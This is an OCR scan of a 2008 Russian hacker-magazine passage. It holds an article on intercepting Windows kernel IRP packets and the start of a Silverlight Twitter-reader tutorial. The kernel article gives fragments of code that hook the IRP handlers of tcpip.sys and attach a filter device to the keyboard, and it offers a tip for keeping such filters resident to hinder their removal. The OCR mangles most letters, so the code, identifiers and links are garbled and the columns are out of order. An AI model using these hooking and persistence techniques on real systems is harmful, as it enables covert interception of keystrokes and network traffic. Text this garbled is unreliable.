Если быть очень кратким, то объекты устройства в ядре ѴѴІпсіоѵѵб могут быть: 

• РИузісаІІу Оеѵісе ОЬ]ес* (Р00) — представляет собой какое-то физичес- 
кое устройство в системе; 

• Рипсйопаі Оеѵісе ОЬіес* (Р00) — реализует всю функциональную нагруз- 
ку какого-то устройства; 



• РіИегіпд Оеѵісе ОЬ]ес* (РЮО) — объект устройства, создаваемый фильтр- 
драйвером. 

Из вышеописанного следует, что утверждение «мышь имеет драйвер» 

— неоднозначно. Открою страшную тайну — мышью Р5/2 управляет не 
один драйвер, а целых три: тоисіазз.зуз І8042.зуз -> АСРІ.зуз. И так со 
всеми устройствами в ѴѴІпсІоѵѵз! Рассказывать про организацию стека ус- 
тройств в ядре ѴѴІпсІоѵѵз мы сейчас не будем — уж больно обширная тема, 
да и в интернете информации можно добыть предостаточно (например, 
поищи книгу Уолтера Оуни «Ргодгаттіпд *Ье МісгозоК ѴѴІпсІоѵѵз Огіѵег 
Мосіеі»), В программировании драйверов под ѴѴІп есть интересная осо- 
бенность — можно написать драйвер-фильтр, который реально встроить 
в указанную цепочку драйверов и получить неограниченный контроль 
над любым устройством в ѴѴІпсІоѵѵз, будьто клавиатура, файловая систе- 
ма или сетевая карта! 

НІКР-ПАКЕТЫ 

Подсистема ввода-вывода в ядре ѴѴІпсІоѵѵз управляется путем пересылки 
междуустройствами своеобразных пакетов —так называемых ІРР-паке- 
тов (1/0 Нециезі Раскеі). 

При вызове какого-либо системного сервиса (например, чтении или за- 
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писи файла) диспетчер ввода-вывода создает ІРР-пакет и отправляетего 
в путешествие вниз по стеку устройств, отвечающих за файловую систему. 
Результат обработки запроса также вернется инициатору в виде ІРР-паке- 
та, который будет содержать всю необходимую информацию. 

Глубоко не вдаваясь в назначение полей ІРР-пакета, отметим, что он 
состоит из двух логических частей: фиксированной, неизменяемой при 
прохождении стека, и динамичной —так называемого стека ввода-выво- 
да, где хранится информация, изменяемая при прохождении от устройства 
к устройству. 

В состав структуры ЕРІѴЕР_ОВЗЕСТ входит массив Мао огЕипсѣіоп. В 
него помещаются «сІізраѣсЪ. гоиѣіпез» — указатели на процедуры, 
предназначенные для обработки разныхтипов ІРР-пакетов. Каждый 
элемент этого массива соответствует своему типу ІРР. Если, например, 
драйверу необходимо обрабатывать запрос типа ІРР_МЗ_РЕАР, уведом- 
ляющий о чтении файла, то он должен поместить в соответствующую 
позицию массива МауогРипсѣіоп указатель на функцию, которой и 
будут направляться запросы этого типа. Если такая функциональность 
драйверу не нужна, то этот элемент массива МазогЕипсѣіоп можно 



Ю_ЗТАТЦЗ_вьоск, которая, в свою очередь, содержит в себе М_І- 
код. При прохождении ІРР-пакета через стекустройств 1/0 диспетчер 
просматривает, какой ІѵУ-код содержит пакет и вызывает в драйверету 
процедуру, которая должна обрабатывать такие ІРР-пакеты. 
Окончательный список кодов ввода-вывода можно без труда найти в 
заголовочных файлах в пакете ѴѴйК (00К). Но наибольший интерес пред- 
ставляют собой не М3 -коды ввода-вывода. Как ты, наверное, успел до- 
гадаться, управлять всеми устройствами в ѴѴІпбоѵѵз двадцатью восьмью 
вариантами кодов невозможно. В структуре ІРР-пакета существуюттак 
называемые МіпогЕипсбоп, которые детализируют управление устройст- 
вом, указывая, что ему нужно сделать конкретно. Самое обидное, что 
кодов обработчиков минорных функций много, но они мало до куме нтиро- 
ваныиихописание приходится по крупицам собирать в Сети. К примеру, 
при подключении новых устройств драйвер шины в ядре ѴѴІп вызовом 
ядерной функции іоІпѵаІісІаІеЕеѵісегеІаІіопз создает ІРР-пакет 
с Марг-кодом ІКР_МЗ_РМР и с Міпог-кодом ірр_мы_Оііеку_оеѵіСЕ_ 
КЕЬАТІОЫЗ, который вернет РпР-диспетчеру список специфических для 
данного устройства «зависимостей» от шины. Тебе, как разработчику рут- 



оставить равнымМ/ЬЬ. Всего в массиве 28 элементов. Опишем самые 
важные из них: 

1) 1РР_№и_СРЕАТЕ — код передается при создании нового объекта либо 
при обращении куже существующему объекту-файлу и соответствует 
ѴѴІп32-функции СгеаѣеЕіІе. 

2) 1РР_МЗ_РЕА0 — код передается при чтении существующего объекта- 
файла и соответствует ѴѴіп32-функции РеадЕіІе () . 

3) ІКР_МЗ_ѴѴКІТЕ — код передается по стеку устройств при записи в 
существующий файл и соответствует, какты уже понял, ѴѴіп32-функции 

МгііеЕіІе ( ) . 

4) ІКР_МЗ_0ЕѴІСЕ_С0МТК0І_ — код будет передан в стек в тех случаях, 
когда устройство контролируется посредством ЮСИ-запросов. Это, кста- 
ти, один из способов «общения» драйвера с юзермодным приложением. 
Соответствует ѴѴІп32-функци и ЕеѵісеІоСопѣгоІ () . 

5) ІРР_МЗ_ІІМТЕРМАІ__ОЕѴІСЕ_СОІМТРОІ_ - код пересылается при взаи- 
модействии драйверов друг с другом. 

Здесь важно уяснить, что в ІРР-пакете содержится указатель на структуру 



китов, должна быть понятна одна вещь: самое интересное при перехвате 
ІРР-пакетов — это коды минорных функций, потому что они конкретизи- 
руют управление устройством. 

Н П Е РЕХВАТ ІРР- П АКЕТО В 

Стеорией хватит, настало время перейти к главному блюду — организации 
перехвата ІРР-пакетов в ядре. 

Существует два прямых способа для организации перехвата ІРР-пакетов в 
ядре — заменить функции обработчики ІРР на свои или же создать вирту- 
альное устройство и присоединить его к интересующему нас. 

Первый метод прост. Мы просто ставим хуки на функции обработки ІРР-па- 
кетов в массиве Мао огЕипсѣіоп, который имеется в структуре ЕРІѴЕР_ 
ОВЗЕСТ. Найти ее не составит труда. 

СуресЗеб зСгисС _БКІѴЕК_ОВЦЕСТ { 

РБЕІ ѴЕЕ_Б 1 8 РАТСН МаЗ огЕипсРіоп 
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} БВІѴЕВ_ОВБЕСТ; 



Способ не лишен как достоинств, так и недостатков — его легко установить, 
нолегко и обнаружить. Проверка целостности таблиц обработчиков ІПР- 
пакетов реализуется практически всеми антивирусами и файрволами. 

ПОДМЕНА ІКР-ОБРАБОТЧИКОВ В ДРАЙВЕРЕ ТСРІР.5У5 

БТЗТАТБЗ ТсрНоок ( Ш РЕІЬЕ_ОВЦЕСТ рРІ1е_Сср, 

Ш РБЕѴІСЕ_ОВБЕСТ рБеѵ_Сср, 

Ш РБКІѴЕК_ОВБЕСТ рБгѵ_Ссрір) 



Прохождение ІРР-пакета по стеку драйверов в ѴѴІпбоѵѵз 



Бор_зБаск_с1еѵісе = ІоАккасЪВеѵісеТоБеѵісеЗкаск 
(кеуЪоагсЦіеѵісе , сІеѵісе_Ьо_аккас]т) ; 



геСигп БТ_ЗБССЕЗЗ ( зкакиз ) ; 



{ 



ШІСОБЕ_ЗТКІШ кср_с!еѵісе; 

ВБІІпікБпісосіеЗСгіпд ( &Сср_с1еѵісе , " \\Веѵісе\\Тср" ) ; 
зкакиз = ІоСекВеѵісеОЬд ескРоіпкег ( &Сср_с1еѵісе , 
ЕІБЕ_КЕАБ_БАТА, &рЕі1е_Ьср, &рБеѵ_Ьср) ; 
рБгѵ_Ьсрір = рВеѵ_кср->ВгіѵегОЬд есБ ; 
о1сі_ІВ.Р_МЦ_ВеѵісеСопСго1 = рВгѵ_ксрір-> 

Ма ^ огЕипсСіоп [ ІКР_МБ_БЕѴІСЕ_СОЫТКОБ] ; 
геСигп ЫТ_ЗІІССЕЗЗ ( зВаСиз ) ; 



} 



Второй способ перехвата вполне легален и хорошо документирован. 
Необходимо присоединиться ктомуустройству, которое нас интересует. К 
примеру, для организации перехвата (и, если необходимо, работы с сете- 
вым трафиком в ядре) нужно создать устройство вызовом кегпеі-функции 
іоСгеаІеЕеѵісе. После чего вызовом іоАііасЪБеѵісеТоОеѵісеЗі: 
аск[ или іоАііасЬБеѵісе } присоединить его к одному из устройств (или 
— сразу ко всем), которые создает драйвер ісрір.зуз — \Реѵісе\ір , 
\Ееѵісе\Тср, \Беѵісе\Каѵ7Ір , \Ееѵі се \ 17<3р. После этого созданное 
нами устройство будет помещено в стек интересующего насустройства, и 
все адресованные фильтруемому устройству пакеты будут проходить через 
созданный нами беѵісе. 

ПРИСОЕДИНЕНИЕ СОЗДАННОГО УСТРОЙСТВА К КЛАВИАТУРЕ 

БТЗТАТБЗ НоокКеуЪоагсІ ( Ш РБКІѴЕК_ОВБЕСТ рВгіѵегОЪз есВ , 
Ш РБЕѴІСЕ_ОВБЕСТ сіеѵісе_Во_аВВас]т) 



} 



Здесь деѵісе_ѣо_аѣѣасЪ — указатель на ЕЕѴІСЕ_ОВЕЕСТ у ст р о й ств а « \ \ 
Беѵісе\ \КеуЪоаг<ЗС1аззО», полученный вызовом функции ІоСеѣЕеѵіс 
еОЪзесѣРоіпѣег () ,а Сор_зѣаск_<Зеѵісе — указатель на то устройство, 
которое находится на самой вершине стека устройств. Необязательно это 
будет созданное нами устройство, потому что в стеке устройств уже могут 
находиться другие фильтры. 

Теперь, если кто-то попытается открытьустройство « \ \Беѵісе\ \ 
КеуЪоагдСІазз 0» вызовом СгеаѣеРіІе () , будет открыт девайс, находя- 
щийся на вершине стека. 

Ну что ж, возрадуемся — все запросы, которые будут направляться 
клавиатуре, пройдут через созданное нами устройство-фильтр, и мы 
сможем делать с ними все, что захотим. Но это только половина дела. 
Далее нужно позаботиться о получении содержимого пакета — ведь для 
этого мы и городили огород! Для начала надо предусмотреть в нашем 
драйвере установку обработчика той МащгРипсііоп, обработку которой 
нам необходимо перехватить. Выглядит это примернотак: 
(ОРІѴЕР_ОВЕЕСТ*) - >Мао огЕип сііоп [ ІКР_МЕ_ЕЕѴІСЕ_СОЖКОЬ ] = 
РізраІсЪ. 

И, разумеется, надо не забыть предусмотреть реализацию функции 
ОІБраІсЬ, примерно воттаким образом: 

ФИЛЬТРУЕМ ОТПРАВКУ ДАННЫХ ПО СЕТИ 

БТЗТАТБЗ БізраБсЪ. ( 

Ш РБЕѴІСЕ_ОВБЕСТ рБеѵісеСВД еск , 

Ш РІВР Ігр) 



{ 



{ 



РБЕѴІСЕ_ОВБЕСТ кеуЪоагс!_с1еѵісе , Сор_зкаск_с1еѵісе ; 
БТЗТАТБЗ зкакиз = ІоСгеакеБеѵісе (рБгіѵегОкд еск , 
ЗІгеоі: (ВЕѴІСЕ_ЕХТЕБЗІ(Ж) , ШЬЬ, 

ЕІБЕ_ВЕѴІСЕ_КЕУВОАКБ, 0 , Сгие, &кеуЬоагсі_(аеѵісе) ; 
Вк12егоМетогу (кеуЪоагс!_с1еѵісе-> 

БеѵісеЕхкепзіоп, зігеоб (БЕѴТСЕ_ЕХТЕЫЗІ(Ж) ) ; 
РБЕѴІСЕ_ЕХТЕБЗІ(Ж с кеуЪоаг<і_с1еѵісе_ехСепзіоп = 

( РБЕѴІСЕ_ЕХТЕЫЗІ(Ж) кеуЪоагс!_(Іеѵісе-> 
БеѵісеЕхкепзіоп; 

ШІСОБЕ_ЗТВШС кеуЪоагсІВеѵісеБате ; 



зкаск = ІоСекСиггепкІгрЗкаскЕосакіоп ( Ігр) ; 
іб ( зкаск->Маз огЕипскіоп == 

ВР_МБ_ШТЕШАЕ_ВЕѴІСЕ_С(ЖТКОБ) 

{ 

іб ( зкаск->МіпогЕипсСіоп == ТБІ_ЗЕББ) 

{ 

тсІІВиіНіег = МшСекЗузкетАсІсігеззРогМсІІЗабе 
(Ігр->Мс1ІАс1с1гезз , БомРадеРгіогіку ) ; 
ііЕ (шсІІВиб^ег) 

{ 

/ / . . .Химичим с пакетом. . . 
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} 

} 

} 

ІоЗкірСиггепкІгрЗкаскБосакіоп ( Ігр) ; 
гекигп 

ІоСаІІБгіѵег ( 

( ( РБЕѴІСЕ_ЕХТЕБ8І(Ж) рБеѵісеСВД еск -> 
БеѵісеЕхкепзіоп) ->кор_зкаск_сІеѵісе , 



куда и какие фильтры подгружать системе при за грузке устройс- 
тва (более подробно — читай ѴѴОК). 

Перечислим три возможных способа «воткнуть» фильтр: 

• над РйО; способ не документирован, но реализовать можно; 

• между РИО и Р00;для этого нужно использовать ключ реестра 
ЬоыегРіІѣегз ; 

• над РйО; для этого используется ключ реестра ііррегРіІѣегз. 
Сейчас не будем углубляться в эти дебри. Оставляю экспери- 
менты с фильтрами в качестве домашнего задания. 



Ігр) ; 



} 



г ПОГОВОРИМ О РАЗНО 



Вызов іоСаІІРгіѵег отправит твой модифицированный 
ІРР-пакет дальше по стеку устройств. 

Кстати, возникает закономерный вопрос — где нам искать 
буфер, в котором пользователь передает данные? 
Рассмотрим три варианта. Первый — в буфере самого ІПР- 
пакета (так называемый «буферизованный в вод- вы вод»); 
указатель на буфер будет лежать здесь — Аззосіаіесіігр . 
Зуз I етВи РРег. 

Второй — «прямой ввод-вывод». В ІРР-пакете хранится 
л ишь указатель на кусок ядерно й памяти в виде МОб-струк- 
туры, где лежат пользовательские данные. В этом случае 
ищи данные вот здесь — Ігр -> МсІІАсІсІгезз. 

И, наконец, третий вариант — «в вод- вы вод без управ- 
ления». Это когда диспетчер ввода-вывода помещает в 
поле ОеѵісеІоСопѣгоІ . ТуреЗІприѣВиРРег структуры 
Ю_ЗТАСК_Ь0САТЮЫу казатель на пользовательский вход- 
ной буфер, а в поле ІІзегВибег ІРР-пакета — указатель на 
пользовательский выходной буфер и оставляет драйверу 
возможность управлять ими самостоятельно. 

Н РАЗМЕЩЕНИЕ ДРАЙВЕРА-ФИЛЬТРА 

Куда можно приаттачить созданный нами драйвер-фильтр? 

По умолчанию вызов іоАѣѣасІіВеѵісеТоВеѵісеЗѣаскзз- 
ки нет его сразу над фильтруемым девайсом. А если, скажем, 
требуется разместить фильтр ПОД устройством? Такое тоже 
возможно! В реестре ѴѴІпсІоѵѵз, в ветке, которая описываетто 
или иное устройство, существует возможность определения, 



Что такое РазбО? Какты уже понял, в основе взаимодействия 
между устройствами в ядре ѴѴІпсІоѵѵз лежит ІРР-пакет. Ме- 
ханизм хоть и надежен, но на самом деле не слишком быстр, 
ведь ядру приходится тратить много времени на обработку 
ІПР-пакетов. Втех случаях, когда критична скорость выпол- 
нения запроса, ІПРзаменяет .РазСХО — концепция «быстрого 
ввода-вывода», при которой драйвер регистрирует «точки 
ввода-вывода». К примеру, РазбО используется в драйверах 
файловых систем ІЧТР5, РАТ, РЮРЗ, С0Р5. 

Использование РазѣЮ в современных операционных 
системах предполагается в двух случаях. Во-первых, для 
обеспечения интеграции с механизмом кэширования данных, 
в частности при работе с файловой системой. Во-вторых, 
РазбО, используется для обеспечения работы с файлами, 
промаппированными (спроецированными) в оперативную 
память. 

НХИТРОСТЬ ВМЕСТО НАПУТСТВИЯ 

Мы научились кодить простые фильтры. Они помогуттебе 
поставить на колени любые устройства в ѴѴІпсІоѵѵз. Единст- 
венный недостатокустройств-фильтров в ядре — их легко 
обнаружить. Подскажу одну хитрость. Фильтры можно сделать 
невыгружаемыми. Для этого достаточно «забыть» про реали- 
зацию функции выгрузки драйвера. 

Фильтрация ІПР — тема сложная и, ксожалению, ее не рас- 
крыть в пределах одной журнальной статьи. Азы в фильтрации 
тебе придется изучать самому, а если что непонятно — пиши, 
будем разбираться вместе! □С 




> Ипкз 

Обязательно к про- 
чтению: 

• ЬирѴ/ѵѵѵѵѵѵ.ѵѵазпп.ги/ 
ргіпбрЬр?агбсІе= 
бгѵѵѵ2к1 5 — статья 
«Драйверы режима 
ядра: Часть 1 5: Жиз- 
ненный цикл ІПР». 

• ЫірѴ/ѵѵѵѵѵѵ. 
озгопііпе.сот/а гбсіе. 
сбт?ісІ=83 — Зесгеіз оі 
Ібе ІІпіѵегзе Неѵеаіесі! 
Ноѵѵ І\ІТ НапсІІез 1/0 
Сотріебоп. 

• ЫірѴ/ѵѵѵѵѵѵ. 
озгопііпе.сот/а гбсіе. 
сІт?агбсІе=391 

— Ргорег Сотріебоп. 
НезиЬткбпд 

ІРРз ітот ѵѵібпіп а 
Сотріебоп Роибпе. 

• ЫірУ/зиррогб 
тісгозоб.сот/ 
кЬ/320275, Ыір:// 
зиррогбтісгозоб. 
сот/кЬ/32631 5 

— йібегепі: ѵѵауз оі 
ЬапсІІІпд ІРРз. 




> СІѴСІ 

На компакт-диске 
лежат сорцы просто- 
го драй вера -фильт- 
ра ТСР-трафика в 
ядре ѴѴІпсІоѵѵз, доки 
по фильтрации в 
ѴѴІпсІоѵѵз и РазбО, а 
еще — утилиты для 
просмотра объектов 
ядра ѴѴІпсІоѵѵз 
— ШіпОЪу Ех- 




> ІП^О 

В пакете ѴѴОК (йОК) 
технология филь- 
трации ІРР хорошо 
описана. Не ленись 
читать! 
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ІІуои агепЧ ІатіІіагѵѵіШ ТѵѵіЦег, 
И; із опе оШГюзе іЬіпдз, Ііке 
МуЗрасе, Шаі зоипсіз іоіаііу 
гісіісиіоиз а псі зіирісі ѵѵЬепуои 
Егзі ЬеагаЬоіЛ ІТ ВіЛопсеуои 
з1;а гі; изіпд іі, уои геаііге Ьоѵѵ 
тисЬ Іип И; із. 

Егіс N иги т, АиЛаог сТТЬе ЦеасІ 






НИКОЛАЙ БАЙБОРОДИН 

/ ВАІВОВООШ@СМАІІ..СОМ / 



Зисісіепіу, НзеетзазШоидЬ 
аіі Ше ѵѵогісі'з а-ІѵѵіЦег. 



БЛОГГИНГ 



ПО-НОВОМУ 



ТВИТТЕР-МОНИТОР НА ПЛАТФОРМЕ 5Н.ѴЕРІ.І0НТ 




Мир летит вперед со скоростью немецкого поезда и есть только один способ 
не остаться в лузерах — успеть вскочить на подножку. Кого-то это реально 
напрягает, а другого, наоборот, страшно заводит. Сегодня мы поговорим 
сразу о двух новых технологиях. Одновременно. В конце концов, многоза- 
дачность — одна из тенденций нашего времени. Так что, распараллель свой 
мозг. Нас ждут 5і1ѵег1і§1іі: и микроблоггинг. 



^МИКРОБЛОГГИНГ 

Все мы знаем, что такое блог. Большинство из нас регулярно читают под- 
боркулюбимыхсетевыхдневников. Кто-то даже ведетсвой собственный 
(но таких уже меньше). О чем обычно пишут в блогах? Как правило, ІМ НО 
на зацепившее событие («подруга сделала силиконовыетитьки»). Другой 
вариант — выразить свои эмоции по существенному (или не очень) поводу 
(«новыетитьки я оплатил из своего кармана»). Читая онлайновый дневник, 
можно попробовать узнать, какего автор воспринимаетокружающий мир. 

Но с помощью обычного блога практически невозможно получить представ- 
ления отом, что с человеком происходили что он думает ПРЯМО СЕЙЧАС. 
Иногда человеку достаточно кратко выразить самую суть своих мыслей или 
чувств (которые он думает или переживает сию секунду). Традиционный 
формат сетевого дневника здесь мало пригоден. И на свет появилась новая 
концепция — микроблоггинг. 

Что такое микроблог? Эта такая форма сетевого дневника, при которой 
пользователь пишет короткие текстовые заметки (обычно не более 200 сим- 
волов). Благодаря своей лаконичности, заметки могут составляться очень 
оперативно. Они буквально отражают события онлайн. Например: «Сижу на 
паре. <СепБогеб>. Щаусну». 



Самый популярный сервис, название которого стало нарицательным 
— Тѵѵіиег. Несмотря на появление множества конкурентов (втом числе, 
РасеЬоок и МуБрасе), ТѵѵіЛег продолжает оставаться лидером в этой облас- 
ти. Среди разношерстной аудитории этого сервиса можно встретить немало 
интересных персонажей. Читать иххочется постоянно, а не от случая к 
случаю. И желательно — не отходя от кассы, в смысле, не отвлекаясь от 
важных и неотложных дел. Вотэтим мы и займемся — напишем Тѵѵіиег- 
ридер, предназначенный для мониторинга сообщений избранных авторов 
и отображения их в одном окне. Воспользуемся мы для достижения цели 
одной достаточно новой и интересной технологией. Какой — читай ниже. 

В МІСК050РТ 5ІІ_ѴЕВІ_ІСНТ 

Еслиты живешь не на Луне, то наверняка слышал о двух крупнейших 
акциях компании МісгозоЛ, проведенных в последнее время. Это — «Герои 
среди нас» и «РеМІХ». Последнюю посетил сам Стив Балмер (да не будет 
его светлое имя упомянуто всуе). Оба мероприятия преследовали разные 
цели, но главная идея была общей — «МісгозоЛ идет в веб». «Ничего себе, 
проснулись!», — скажешьты и будешь прав. Однако, ребята из Редмонда 
не зря свой хлеб едят, и даже на столь позднем старте у них есть неплохие 
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шансы потеснить, скажем, ту же Ѳоодіе. Как на упомянутых конференциях, 
таки в прессе, и, конечноже, в Сети много говорится оЗіІѵегІідЬБ Особенно 
после выхода его второй версии. 

Самое простое и емкое объяснение будеттаким: ЗіІѵегІідЫ — достойная 
альтернатива АбоЬе РІазЬ. До последнего времени задача создать яркий, 
вызывающе красивый веб-сайт или веб-приложение со сложной програм- 
мной логикой клиентской части не предполагала никаких других платформ 
разработки, кроме РІазЬ. Все остальное — робкие попытки, не дотягиваю- 
щие до уровня серьезных парней (так, первой на святое покусилась компа- 
ния 5ип, выпустив ІаѵаЕХ, но порвать в клочья флешеров не получилось). 

В настоящее время наиболее распространена версия ЗіІѵегІідЫ; 1 .0. Впро- 
чем, уже существует ЗіІѵегІідМ 2.0, по своим возможностям многократно 
превышающий старшего собрата. 

На стороне пользователя платформа представлена плагином для веб-брау- 
зера. Этот плагин включает в себя полную версию .Ыеі СЕР. Таким образом, 
ЭІІѵегІідЫ-приложениям доступны все прелести ,І\ІеЕ 1 . возможность 
реализации алгоритма на любом из языков программирования, поддержи- 
ваемом .Ыеі; 2. рендеринг пользовательских интерфейсов с помощью ѴѴРР; 
3. тесная интеграция с А5Р .Ыеі и АБО .ЫеЕ 

Надеюсь, ты догадался, сколь широкие возможности открываются перед 
тобой в плане создания веб-приложений. Добавьсюда превосходную подде- 
ржку векторной графики и всевозможных мультимедийных форматов. Кстати, 
ѴѴРР в силу своей текстовой природы (диалектХМІ_) зарабатываетеще одно 
очко в битве с флешем, так как последний передает да иные клиенту в бинар- 
ном формате — и одному Бен Ладену известно, что там намутил кодер. 

С поддержкой браузеров и сторонних ОС всетоже на должном уровне. 
ЗІІѵегІідЫ реализован для ѴѴіпсіоѵѵзХР, ѴѴіпсіоѵѵз Ѵізіа, Мае 05 X, начиная 
с десятки, и браузеров I піегпеі; Ехріогег (шестая и седьмая версия), Могіііа 
Рігеіюх 1 .5 и 2.0, и 5аба гі 3.1 . Могут возрадоваться и линуксоиды — проект 
Мопо (открытая реализация ,І\ІеІ для Біпих) недавно выпустил свою версию 
плагина под названием МоопІідЫ. 

Несмотря на пацанский возрасттехнологии, в Сети уже можно найти 
большое количество ресурсов с подробными уроками по созданию 
ЗІІѵегІідЫ-приложений и демонстрациями возможностей технологии при 
решении самых разнообразныхзадач веб-разработки. Такчто проблем с 
информацией у тебя точно не будет. Однако, технология сама по себе, какой 
бы замечательной она ни была, мало чтозначитв нашем жестоком мире. 
Как свита делает короля, так и технологию делает инструментарий. Что 
предлагает МісговоЛ разработчикам ЗіІѵегІідЫ-приложений, и что из этого 
действительно понадобится? Об этом ты узнаешь, прочитав следующий 
раздел. Еще немного и можно будет начинать кодить! 

^СОБИРАЯСЬ В ДОРОГУ 

Приступая косвоениютехнологии ЗіІѵегІідЫ, придется определиться стем, под 
какую вереи юты будешь создавать свои приложения — первую или вторую. От 
этого зависит, какие инструменты ты будешь использовать. Однозначного совета 
здесь дать не получится. Если ЗіІѵегІідЫ: 2.0 обладает по сравнению сЗіІѵегІідЫ 
1 .0 несравнимо большими возможностями, то первая версия платформы имеет 
гораздо больше установок на клиентские компьютеры. Та к что, решайсам! 
Дляуспешной работы тебе понадобится, какминимум, пакетЗІІѵегІідЫ 
Тооів, позволяющий работать с новой технологией в привычной для нас 
среде Ѵізиа 1 5і;исІ іо. Ну, а для более эффективного использования всех воз- 



ѴѴРР 

В основе 5і1ѵег1і§1іі; лежит другая технология компании МісгобоіТ 
— ѴѴіпсіоѵѵб РгезегНагіоп Роипсіагіоп (ѴѴРР) . Поэтому будет нелишним 
разобраться с тем, какие базовые принципы реализуются ѴѴРР-инс- 
трументарием. Во-первых, это универсальный подход к работе с поль- 
зовательским интерфейсом, документами и медиа-источниками. 
Во-вторых, — декларативная разработка с вовлечением дизайнеров 
в разработку реальных интерфейсов. И, в-третьих, легкость развора- 
чивания приложений через сетевую среду. 



можностей, заложенных в платформе, не помешаетустановить ЗіІѵегІідЫ 
5БК. В принципе, на этом можно остановиться. Но, еслиты даже из про- 
граммы «Неііо , Шогісі» стремишься сделать шедевр изобразительного 
искусства, тоты просто обязан познакомиться с МісговоЙ Ехргеввіоп ВІепсІ, 
позволяющим создаватьумопомрачительные пользовательские интер- 
фейсы с использованием векторной графики. Для работы с БіІѵегІідЫ: тебе 
понадобится вторая версия этого редактора. 

С инструментами разобрались. Теперь о скилзах. 

БіІѵегІідЫ; позволяет декларативно описывать пользовательские интер- 
фейсы на языке ХАМЬ (кури М50ІМ...). Плагин веб-браузера, отвечающий за 
поддержку 5 ІІѵегІідЫ:, осуществляет обработку ХАМ Б-файла (диалект ХМ Б) 
и рендеринг графических объектов. Правда, вникать во все особенности 
ХАМБ и ѴѴРЕтебе пока не обязательно, так как с помощью Ехргеввіоп ВІепсІ 
интерфейс можно просто нарисовать. 

Приложение (какое ни возьми) — это, в первую очередь, программная логи- 
ка. И для создания этой логики, будь она неладна, придется овладеть одним 
из языков программирования. В нашем случае подойдет любой язык, для 
которого реализована поддержка .ЫеБ На всякий случай сообщу, что к 
таковым относятся нетолько Ѵівиаі С++, С# и Ѵівиаі Вавіс, нотакже и РиЬу 
с Питоном. Соответственно, один из нихты можешь выбрать для создания 
своих 5і Іѵегіід Ы мега-хитов. 

ВПЕРВЫЕ ШАГИ 

Напомню, что наша цель заключается в создании приложения, транс- 
лирующего с Тѵѵійег'а сообщения избранных пользователей. Исключи- 
тельно в воспитательных целях создадим простой интерфейс программы 
в Ехргеввіоп ВІепсІ. Естественно, для такого примитивного интерфейса с 
отсутствием даже намека на дизайн можно было бы обойтись средствами 
блокнота. Но пусть это будет элементом сегодняшнего шоу! 

Открывай ВІепсІ и создавай новый БіІѵегІідЫ-проект. Думаю, тебе не соста- 
виттруда намутить дизайн будущего приложения по своему вкусу. 

Главное — заранее предусмотри текстовый блок, в котором впоследствии 
будут появляться транслируемые записи. Послетого, как все будет готово, 
можешь переключиться в режим просмотра ХАМ Б- структуры. Например, 
описание моего незамысловатого, с позволения сказать, дизайна выглядит 
так (несущественные подробности опущены): 

<Сапѵаз 

ШісШЫ " 64 0 " НеідЫс= " 4 80 " 

Васкдгошіс1= " #РР111010 " 

х : Каше= " Раде " > 

<ТехБВ1оск ЭДісІЕЬ» " 454 " НеідкБ= " 186 " Сапѵаз . ЬеРБ= " 109 " 

Сапѵаз . Тор=" 42 " <Кип ТехБ-"ТЖТТЕК МОЫІТОК" /> 

</ТехБВІоск> 

</Сапѵаз> 

Из продемонстрированного примера следуетуяснить две вещи —ХАМБ 
имееттекстовый формат со всеми вытекающими; все элементы, описы- 
вающие ЗіІѵегІідЫ-интерфейс, должны быть вложенными в контейнер 
<Сапѵаз>. Двигаемся дальше. 

Нажав <Е5>, ты можешь запустить проект на выполнение и посмотреть, как 
будет выглядеть приложение в веб-браузере. Если тебя все устраивает, 
переходи к написанию программной логики. Я бы посоветовал переклю- 
читься на Ѵівиаі Зіисііо. Делается это очень просто — в контекстном меню 
своего проекта выбирай пункт ЕйіЬ іп Ѵізиаі Зѣидіо. Запустится доро- 
гая сердцу среда разработки, в которой мы продолжим работу по созданию 
приложения. 

Как видишь, в своем исходном и пока еще нетронутом рукой кодера состо- 
янии проект включает в себя четыре файла -.ОеРаиІ I .Ыті, Раде, хаті, 
5і1ѵег1ідЪ_ѣ .зз и МеЪ. сопіід. Разберемся в назначении каждого из них. 
Файл ОеРоиІ ѣ .Ьѣті — обычный НТМБ-файл, выполняющий функцию 
контейнера для ЗІІѵегІідЫ-контролов. За управление загрузкой контрола 
и взаимодействием со средой пользователя отвечают файлы с ЭаѵаЗсгірІ- 
сценариями Раде. хаті . уз и ЗіІѵегІідЪѣ . уз. Интерфейс приложения 
описан в файле Ра де. хаті. Ну а МеЪ. сопЪід — стандартный файл конфи- 
гурации А5Р-приложений. 



ХАКЕР 07 /115/ 08 
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^ согііпд 




иі | п ь* Д і 1 1 г і і ■■■ГТ$ф . 







Т\л/і1;1;ег собственной персоной 



У автора атрофировано чувство прекрасного 




Н РАЗБОРКИ СТѴѴІТТЕГСАРІ 

Остались сущие мелочи — написать движокТѵѵіиег-клиента. Самым ра- 
зумным будет оформить его в видедвух классов — непосредственно клиент, 
реализующий функционал ЗіІѵегІідЫ-приложения, и класс с реализаций 
ТѵѵійегАРІ. При внесении существенных изменений в официальный Тѵѵійег 
АРІ можно будет переписать соответствующий класс, оставив остальную 
часть приложения нетронутой (как раз втакую ситуацию и попал автор при 
подготовке статьи). 

Интересующий нас АРІ слишком громоздок для того, чтобы приводить 
его реализацию в полном объеме. В то же время — он достаточно прост, 
чтобы понять необходимые детали, ознакомившись с программным кодом. 
Поэтому остановимся на ключевых моментах, а все остальное можноузнать 
из исходников — или, не вникая в детали, просто использовать в своих 
проектах мой код. Все, что оттебя требуется взамен — при случае сообщить 
о найденных багах и возникших идеях поулучшению. 

Основу АРІ составляютдва метода \ЕхесиѣеСеѣСоттап(і ( ) и 
ЕхесиѣеРозѣСоштапсі ( ) . Оба предназначены для обращения ксерверу 
и получения от него интересующей информации. Каждый из них имееттри 
параметра: игі, изегЫате и раззѵюгсі. Их назначение понятно из названий. 
Методы открыва ют соединение судаленнымузлом и чита юте него поток. Ниже 
— пример метода ЕхесиѣеСеѣСоштапсІ ( ) без контроля исключений: 

ргоСесСесі зСгіпд ЕхесиСеСеССоттапсі ( зігіпд игі, 
зСгіпд изегАГате, зігіпд раззѵгогсі) 

{ 



ЗіІѵегІіДп 2.о ѵз. 
ЗіІѵегІіДіІ: і.о 

Краткий перечень улучшений второй версии платформы: 

• Сопітоіз 

• Ьауоиіз 

• Зіуіез/Тетріаіюз 

• Ваіа Віпс1іп§ 

• НТТР/5 апй Зоскеіз 

• Поддержка С# и ѴВ .Пет 
•ЬЩ) 

• ХМЬАРІ 

• ТЗСЖ 

• СгуршАРІз (АЕЗ) 

• ТЪгеайз 



